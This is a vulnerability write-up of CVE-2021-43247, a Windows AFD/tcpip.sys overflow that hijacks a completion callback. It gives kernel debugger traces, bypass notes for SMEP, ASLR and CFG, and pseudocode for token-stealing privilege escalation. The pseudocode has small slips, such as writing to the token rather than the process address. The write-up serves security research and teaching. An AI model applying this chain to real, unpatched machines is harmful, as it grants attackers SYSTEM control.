In this blog post I will go in depth into the inner workings of CVE-2021-43247, which was fixed on the 14th of December 2021. This bug was classified as “Windows TCP/IP Driver Elevation of Privilege Vulnerability”. The vulnerability itself was probably dormant for a long time, but became exploitable when the AF_UNIX address family was first introduced in 2019.

I will also take this as an excuse to explain in detail, what drivers are, how user space communicates with drivers, what a Local Privilege Escalation (LPE) is and what how we can achieve it in this case.

The goal / what is an LPE (Local Privilege Escalation)

A Local Privilege Escalation (sometimes also called Elevation of Privilege or EoP) is an exploit which obtains some privilege that it is not supposed to be able to get. In the traditional cases (as in this one) this means we start out with at normal user shell and end up with administrator access. On Linux this would be about obtaining a root shell. This is usually done through a bug in a privileged process, a bug in a driver or a bug in the operating system itself.

As the CVE description tells us, we are dealing with a bug in the TCP/IP driver.

What are drivers and how does user space communicate with them?

Drivers are simply PE files, which the kernel loads into the kernel address space. PE (Portable Executable) is the executable file format used by Windows, it’s used by “.exe” and “.dll” files. Drivers usually have the file extension “.sys”, but there are also library drivers which also get the “.dll” file extension. Most drivers are contained in the “C:\windows\system32\drivers” directory. What drivers are loaded on system startup is determined by the registry and the physical devices available to the system.

User space can communicate with the loaded drivers using kernel system calls (or syscalls for short). For example, consider the program

// blog_socket.c - small example program used in this blog

#include <winsock.h>

int main() {
    // Initialize WinSock
    WSAStartup(MAKEWORD(2, 2), &(WSADATA){0});

    // Create a TCP/IPv4 socket.
    SOCKET Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    
    // Bind the socket to any address
    bind(Socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr));
}

Then we can observe the following call stack:

00 ntdll!NtCreateFile
01 mswsock!SockSocket+0x56e
02 mswsock!WSPSocket+0x23a
03 WS2_32!WSASocketW+0x130
04 WS2_32!socket+0x6e
05 blog_socket!main+0x84

ntdll!NtCreateFile is the function that actually transitions into the kernel address space. The assembly for all ntdll!NtXxx functions looks something like the following:

NtCreateFile:
   mov r10, rcx   ; load the first argument into r10, as the syscall
                  ; instruction uses rcx as the return location
   mov eax, 0x55  ; load the syscall value into eax (0x55 is 'NtCreateFile')
   
   test byte ptr [.Running32Bit], 1 ; check if we are running a 32bit executable
   jnz .Syscallx86
   
   ; syscall transitions into the kernel. 
   systcall
   ret
   
.Syscallx86:
   ; x86 does not have a syscall instruction, use int 0x2e instead of syscall.
   int 0x2e
   ret

We will only focus on the x64 case here. The syscall instruction loads the new instruction pointer from a specialized hardware registers (called a model specific register or MSR). Namely, the MSR IA32_LSTAR. It also stores the return address (in this case the address of the ret instruction) into rcx and sets the privilege level of the processor to 0. This is why kernel mode is sometimes referred to as ring 0.

When the processor is running at privilege level 0, it can access kernel space memory. Here it is important to know that the address space does not change, but at non-zero privilege level the processor faults when it is accessing a page which does not have the USER bit set in the page table.

In Windows 10 the IA32_LSTAR MSR points to the function nt!KiSystemCall64, which first establishes a stack pointer:

KiSystemCall64:
    swapgs                        ; load saved kernel thread locals from some MSR
    mov gs:[gs.user_stack], rsp   ; save user stack, in the kernel thread locals
    mov rsp, gs:[gs.kernel_stack] ; load kernel space stack, from the thread locals

    ; ... from here we are just in kernel space, and can do whatever we want
    ;     e.g. Save all the registers and then call the according NtXxx
    ;          kernel function depending on eax.

The kernel then figures out what kernel function was requested by looking at eax and transitions to it. In this case we end up in nt!NtCreateFile (on the kernel side).

00 nt!NtCreateFile                  <-- Kernel space function   
01 nt!KiSystemServiceCopyEnd+0x25
02 ntdll!NtCreateFile+0x14          <-- User space function
03 mswsock!SockSocket+0x4ec
04 mswsock!WSPSocket+0x233
05 WS2_32!WSASocketW+0x1be
06 WS2_32!socket+0x9b

Note that the address space is still the same, as in user space. The difference being that we are now allowed to access kernel memory. The arguments to nt!NtCreateFile are unchanged from the arguments ntdll!NtCreateFile received. The kernel very carefully validates all arguments and copies them safely to kernel space memory.

In this case “mswsock.dll” tries to open a HANDLE to AFD or the “Ancillary Function Driver for WinSock”.

AFD

AFD is located at “C:\windows\system32\drivers\afd.sys” and provides implementations for the usual socket functions.

As I have hopefully been able to convince you the socket function corresponds to opening a HANDLE to AFD using NtCreateFile. Using the HANDLE returned by NtCreateFile, communication occurs via the NtDeviceIoControlFile:

__kernel_entry NTSTATUS NtDeviceIoControlFile(
  [in]  HANDLE           FileHandle,
  [in]  HANDLE           Event,
  [in]  PIO_APC_ROUTINE  ApcRoutine,
  [in]  PVOID            ApcContext,
  [out] PIO_STATUS_BLOCK IoStatusBlock,
  [in]  ULONG            IoControlCode,
  [in]  PVOID            InputBuffer,
  [in]  ULONG            InputBufferLength,
  [out] PVOID            OutputBuffer,
  [in]  ULONG            OutputBufferLength
);

Here, each different socket function corresponds to an IoControlCode or ioctl for short. For example, if we bind the socket we end up in afd!AfdBind

00 afd!AfdBind
01 afd!AfdDispatchDeviceControl+0x7d
02 nt!IofCallDriver+0x59
03 nt!IopSynchronousServiceTail+0x1b1
04 nt!IopXxxControlFile+0xe0c
05 nt!NtDeviceIoControlFile+0x56
06 nt!KiSystemServiceCopyEnd+0x25
07 ntdll!NtDeviceIoControlFile+0x14
08 mswsock!WSPBind+0x278
09 WS2_32!bind+0xdf
0a blog_socket!main+0x137

Similarly, recv corresponds to AfdReceive, send corresponds to AfdSend and so on. The arguments and return values of these functions are serialized into the InputBuffer and OutputBuffer, respectively.

The Bug

The bug combines three different features that Windows 10 provides. The TCP_FASTOPEN option, the ConnectEx/AfdSuperConnect function and the AF_UNIX address family.

TCP_FASTOPEN

Taken from Wikipedia, the TCP_FASTOPEN option allows the client under certain conditions to start sending data to the host without waiting for the ACK packet. For us, what it does is not important, only that it is necessary to call AfdSuperConnect later on.

AF_UNIX

As mentioned by this blog, the vulnerability probably turned exploitable when Windows started supporting sockets of type AF_UNIX. AF_UNIX sockets provide a means of inter-process communication. For us the important fact is that the associated sockaddr looks like this:

#define UNIX_PATH_MAX 108

typedef struct sockaddr_un
{
     ADDRESS_FAMILY sun_family;     /* AF_UNIX */
     char sun_path[UNIX_PATH_MAX];  /* pathname */
} SOCKADDR_UN, *PSOCKADDR_UN;

And therefore, with a size of 110 = 0x6e is quite large.

ConnectEx

The ConnectEx function is a Microsoft specific extension, which can be queried using WSAIoctl. The underlying kernel function is AfdSuperConnect. Sadly, the user space API validates the arguments to ConnectEx and therefore we are forced to call it using NtDeviceIoControlFile directly. The socket functions do not expose the underlying handles to AFD. This forces us to use NtCreateFile and NtDeviceIoControlFile directly for all communication with AFD.

AfdSuperConnect gets invoked when using NtDeviceIoControlFile with the ioctl 0x120c7. The input buffer for this call consists of 10 bytes, most of which seem to be unused and then any sockaddr. The vulnerability occurs when AfdSuperConnect attempts to connect to a sockaddr of type AF_UNIX.

The Setup

  1. Create an AF_INET socket using NtCreateFile.
  2. Enable the TCP_FASTOPEN option using AfdTliIoControl (NtDeviceIoControlFile with ioctl 0x120bf).
  3. Bind the socket to any address using ioctl AfdBind (NtDeviceIoControlFile with ioctl 0x12003).
  4. Trigger the vulnerability by using AfdSuperConnect (NtDeviceIoControlFile with ioctl 0x120c7) passing a sockaddr of type AF_UNIX.

As we opened the socket as an AF_INET socket, the call to AfdSuperConnect ends up in tcpip!TcpTlProviderConnectAndSend.

00 tcpip!TcpTlProviderConnectAndSend
01 afd!AfdSuperConnect+0x10b26
02 afd!AfdDispatchDeviceControl+0x7d
03 nt!IofCallDriver+0x59
04 nt!IopSynchronousServiceTail+0x1b1
05 nt!IopXxxControlFile+0xe0c
06 nt!NtDeviceIoControlFile+0x56

tcpip!TcpCreateConnectTcb checks early on whether the TCP_FASTOPEN option is enabled and if it is not it returns with the error code STATUS_RETRY. If it is, it allocates a big internal structure and later on copies the sockaddr we provided into the internal structure.

// Ghidra Decompilation from (tcpip!TcpCreateConnectTcb)

SockaddrFamily = *TlConnect->ConnectSockaddr;
if (SockaddrFamily < 0x23) {
    sockaddr_size = (&::sockaddr_size)[SockaddrFamily];
}
      /* this is where the magic happens */
memcpy(&_Dst->contains_the_function_pointer->sockaddr,
       TlConnect->ConnectSockaddr, sockaddr_size);

Crucially, as this is all happening in “tcpip.sys”, the code only expects a sockaddr of type AF_INET or AF_INET6 which are of size 0x1c and 0x24, respectively. Hence, tcpip only reserves 0x24 bytes of memory for said sockaddr and we can overwrite 0x6e - 0x24 bytes after the size reserved for the sockaddr. Fortunately for us, this range of bytes contains a callback function pointer (originally pointing to afd!AfdTLBufferedSendComplete) and its callback context argument.

Prior to the vulnerable memcpy:

kd> dq rax + f8 L2
ffffac8e`6702a138  fffff806`2d0db540 ffffac8e`6841c9e0
kd> ln fffff806`2d0db540
    (fffff806`2d0db540)   afd!AfdTLBufferedSendComplete

After the vulnerable memcpy:

kd> dq ffffac8e`6702a138 L2
ffffac8e`6702a138  13371337`13371337 deaddead`deaddead

The call to tcpip!TcpTlProviderConnectAndSend eventually fails, returning a status code of STATUS_INVALID_ADDRESS_COMPONENT, but not before trying to “complete” the request, by calling the callback function pointer, passing its callback context as the first argument.

Breakpoint 3 hit
tcpip!guard_dispatch_icall_nop:
fffff803`11e36490 ffe0            jmp     rax
kd> r rax, rcx
rax=1337133713371337 rcx=deaddeaddeaddead
kd> k
 # Child-SP          RetAddr           Call Site
00 ffffeb0f`32dc18e8 fffff803`11d767fd tcpip!guard_dispatch_icall_nop
01 ffffeb0f`32dc18f0 fffff803`11d73840 tcpip!TcpCreateAndConnectTcbComplete+0xc39
02 ffffeb0f`32dc1b30 fffff803`11d88e2a tcpip!TcpShutdownTcb+0x1040
03 ffffeb0f`32dc1f20 fffff803`11d88d38 tcpip!TcpCreateAndConnectTcbInspectConnectComplete+0xba
04 ffffeb0f`32dc2000 fffff803`11d87be8 tcpip!TcpContinueCreateAndConnect+0x1044
05 ffffeb0f`32dc2220 fffff803`11d87998 tcpip!TcpCreateAndConnectTcbInspectConnectRequestComplete+0x118
06 ffffeb0f`32dc2330 fffff803`11d8709d tcpip!TcpCreateAndConnectTcbWorkQueueRoutine+0x8a8
07 ffffeb0f`32dc2450 fffff803`11ea2247 tcpip!TcpCreateAndConnectTcb+0xcb5
08 ffffeb0f`32dc25d0 fffff803`11995606 tcpip!TcpTlProviderConnectAndSend+0x17
09 ffffeb0f`32dc2600 fffff803`1198958d afd!AfdSuperConnect+0x10b26

Exploitability, Mitigations and Complications

As we have seen, the vulnerability gives us full control of the instruction pointer rip and the first argument rcx, and does so by calling into a function pointer we can freely choose. A vulnerability this good is almost always exploitable. But we first have to jump through some loops…

SMEP (Supervisor Mode Execution Prevention)

The simplest idea to exploit a bug of this kind would be to set the instruction pointer to a user space address, i.e write some shellcode that when executed in kernel mode will elevate permissions of the current process. Sadly, Intel thought of this long ago and introduced SMEP. SMEP uses the fact that user-pages have the USER flag set in the page tables to throw an exception when the kernel executes any user address.

ASLR (Address Space Layout Randomization)

Okay, so just executing user space code is out of the question, but what if we first load our shellcode into the kernel? First of, though it sounds hard, it is actually really easy to allocate arbitrary rwx-memory into kernel space using pipes:

char rwx_memory [0x100] = { <my_shellcode> }; // cannot contain zeroes

HANDLE read_pipe;
HANDLE write_pipe;
CreatePipe (&read_pipe, &write_pipe, NULL, NULL);

// ends up in 'NpSetAttribute'
NtFsControlFile(write_pipe, NULL, NULL, NULL, &status, 0x11003C, 
    rwx_memory, sizeof(rwx_memory), output, sizeof(output));

But as far as I know, there is no way for us to know where this allocation will end up (without another exploit or administrator privileges which would defeat the purpose). Even if we could control the heap perfectly we do not know where the heap starts. This is because of ASLR (Address Space Layout Randomization). At system startup, Windows randomizes all addresses it will use during runtime.

So…? Can we somehow get or leak addresses (or pointers) from the kernel? Fortunately, Windows is very nice to us in this respect. There is a user space function called NtQuerySystemInformation, which can be used to retrieve a lot of different kinds of information depending on an InformationClass. The InformationClass we are interested in is SystemModuleInformation. Using it, we can obtain the loaded base address of every currently running driver on the system, including the kernel (ntoskrnl.exe) itself.

By parsing the images contained on disk and using these base addresses, we know the address of every exported kernel function. One could go one step further and look at all symbols using the public symbols (.pdb) provided by Microsoft, but for our purposes restricting the search to exported functions was enough.

CFG (Control Flow Guards)

Okay, the plan is to call exported kernel functions, but there (potentially) is one more obstacle in our way the CFG (Control Flow Guard) mitigation. I did not emphasize this above, but looking at the call stack to the vulnerable call we can see that we are inside of a function called guard_dispatch_icall_nop. This means that control flow guards are disabled. If they were enabled we would instead be inside nt!guard_dispatch_icall. nt!guard_dispatch_icall checks whether the address we are jumping to is registered as a CFG target. If the target is not registered, nt!guard_dispatch_icall crashes the system (mitigating the exploit). This registration happens when the driver is loaded. The binary contains information on which functions are valid CFG targets.

You can also view the CFG information using dumpbin:

> dumpbin /loadconfig C:\windows\system32\ntoskrnl.exe
Microsoft (R) COFF/PE Dumper Version 14.28.29336.0
Copyright (C) Microsoft Corporation.  All rights reserved.


Dump of file C:\windows\system32\ntoskrnl.exe

File Type: EXECUTABLE IMAGE

  Section contains the following load config:

    <...>

    Guard CF Function Table

          Address
          --------
           0000000140200010
       E   0000000140200050
           00000001402000B0
           00000001402001A0
       E   0000000140200580
       E   0000000140200940
       E   00000001402009F0
           0000000140200C40
           00000001402010B0
           00000001402010E0
           0000000140201200
       E   0000000140201750
       E   0000000140201770
           .
           .
           .
           

Therefore, if the exploit is supposed to work even if CFG is enabled, we need to chose our target function as a valid CFG target.

IRQL (Interrupt Request Level)

One last detail that bears mentioning, is the Interrupt Request Level (IRQL). The interrupt Request level is a hardware feature that allows threads to specify what interrupts they are willing to accept. Importantly, if the IRQL is at >= 2 the thread is not allowed to page-fault anymore. This means that when the IRQL is at least two, the thread cannot access pageable memory anymore.

Pageable memory is memory that the Windows kernel reserves the right to spill to disk, if the system is running low on memory. If a thread would then access that memory a pagefault would occur and the Windows kernel would reload the page from disk.

Why is all this important? Well, it just so happens that the function we are overwriting is a “Completion Routine”. Completion Routines are supposed to run at IRQL = 2 and therefore might crash the system whenever they are accessing paged memory. All user space memory is paged and thus the exploit might crash when accessing user space memory. Further, not all kernel space functions are non-paged (though most are), further restricting the set of functions we can use in the exploit.

In reality, we are only interested in providing a proof of concept, so one could just ignore the the fact that the exploit crashes sometimes, but we actually have a solution:

Sometimes, when the kernel uses a piece of user space memory, it uses so called Memory Descriptor Lists (MDL). When such a list is “locked”, the kernel will never page out the memory. Therefore, we just have to make some request, that will “lock” an MDL for the user space memory we are using and then we can reliably use it at IRQL = 2.

Primitives

So, we have control over rip and rcx and can call some exported kernel functions, but what is the plan? Roughly, we want to obtain exploit primitives which allow us to read and write kernel memory:

u64  read_u64(u64 kernel_address);
void write_u64(u64 kernel_address, u64 value);

These will later be used to give our process administrator privileges using a generalized exploit algorithm.

We construct these primitives by using the vulnerability with an exported kernel function. The perfect kernel function for a read primitive would look something like this:

void read_function(struct read_argument *read){
    read->value = read->pointer->value;
}

And the perfect write function would look something like this:

void write_function(struct write_argument *write){
    *write->pointer = write->value;
}

Here the read/write argument would be a pointer to user space memory. This means we have full control of the value of read->pointer and write->pointer, respectively. These pointers then get dereferenced and either written to the controlled write->value or read and stored back into user space memory.

If one cannot find primitives as perfect as these, one can search for functions that spread the first argument. The perfect spread function would be something like:

void spread_function(struct arguments *arguments){
    (*arguments->function)(arguments->argument_1, arguments->argument_2, 
                           arguments->argument_3, arguments->argument_4);
}

Using the perfect spread function one could obtain a read/write function as follows:

void read_write_function_called_by_spread_function(
        struct argument_1 *arg_1, struct argument_2 *arg_2){
        
    arg_1->value = arg_2->value;
}

In practice, we used two spread functions and then different read and write functions.

Windows Exploitation tricks and the general exploit algorithm

The exploitation algorithm we are using is called “Token Stealing”. You can find a lot of information on it online. But we will give a short overview.

Every process has an internal _EPROCESS kernel structure. The access rights of the process are contained in an internal kernel structure called _TOKEN. The _EPROCESS structure references this token, by pointer.

kd> dt nt!_EPROCESS Token
   +0x358 Token : _EX_FAST_REF

kd> nt!_EX_FAST_REF
    +0x000 Object           : Ptr64 Void
    +0x000 RefCnt           : Pos 0, 4 Bits
    +0x000 Value            : Uint8B

Now, if we control the _TOKEN, we have control of all access rights. One option would be to use the read and write primitive to directly alter the access token, but in this case there is a simpler way. If we can locate a process which has SYSTEM access rights, we can simply copy the _TOKEN-pointer of the SYSTEM process into the _EPROCESS->Token of our process. And it just so happens that the kernel exports a pointer to the nt!PsInitialSystemProcess which has SYSTEM access rights.

Therefore, the basic algorithm would be

  1. Use the read primitive to read the value of (nt!PsInitialSystemProcess)->Token
  2. Use the write primitive to write the value to our _EPROCESS->Token field.

Token Stealing

But 2 problems remain:

  1. As the _EPROCESS structure is undocumented and subject to change, the offset of the Token field varies by kernel version.
  2. We do not know where our _EPROCESS structure is.

This is where Windows is really helpful again. Just as we can find all base addresses of kernel modules using NtQuerySystemInformation(SystemModuleInformation), we can find the address of both our _EPROCESS structure (solving 2) and our _TOKEN structure using NtQuerySystemInformation(SystemHandleInformation). Now, using the read primitive, we can iterate through our _EPROCESS structure and locate the _TOKEN structure. This then gives us the offset of the Token field.

Putting it all together in pseudo-code, it looks something like this:

// Use the Windows API to get all the information we want.
token, process := find_token_and_process_using_NtQuerySystemInformation();
PsInitialSystemProcess_export, read_function, write_function := 
        find_exported_symbols_using_NtQuerySystemInformation();

// Use a system call that is more or less equivalent to 
// `socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)`
socket_handle := NtCreateFile("\\Device\\Afd", EaBuffer = {AF_INET, SOCK_STREAM, IPPROTO_TCP});

// use the system call that is equivalent to 
// `setsockopt(socket, IPPROTO_TCP, TCP_FASTOPEN, &(u32){1}, 1)`
NtDeviceIoControlFile(socket_handle, 0x120bf, .input_buffer = {SetSockOpt, .level = IPPROTO_TCP, .option = TCP_FASTOPEN, .optval = &(u32){1}, .optlen = 1});

// use the system call that is equivalent to 
// `bind(socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr))`
NtDeviceIoControlFile(socket_handle, 0x12003, ...);

// The read and write primitives now work by triggering the vulnerability by calling 
// `AfdSuperConnect` through the `NtDeviceIoControlFile`.
function u64 read_u64(u64 address):
    read_argument := {.pointer = address};
    NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_INET, .offset_0x5c = read_function, .offset_0x64 = &read_argument}});
    return read_argument.value;

function void write_u64(u64 address, u64 value):
    write_argument := {.pointer = address, .value = value};
    NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_INET, .offset_0x5c = write_function, .offset_0x64 = &write_argument}});

// figure out the token_offset, by linearly scanning through our `_EPROCESS`
for i from 0 to 0x1000:
    maybe_token := read_u64(process + i * 8);
    if maybe_token == token:
        token_offset = i * 8;
        break;

// figure out the `_TOKEN` of `nt!PsInitialSystemProcess`
PsInitialSystemProcess = read_u64(PsInitialSystemProcess_export);
PsInitialSystemProcessToken = read_u64(PsInitialSystemProcess + token_offset);

// actually steal the access `_TOKEN` to give us complete access rights.
write_u64(token + token_offset, PsInitialSystemProcessToken);

// spawn a shell to keep the access rights in a clean way.
spawn_shell();

Success - An Administrator Shell